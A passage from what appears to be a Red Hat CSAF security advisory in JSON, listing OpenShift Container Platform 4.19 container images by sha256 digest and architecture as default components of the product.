"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
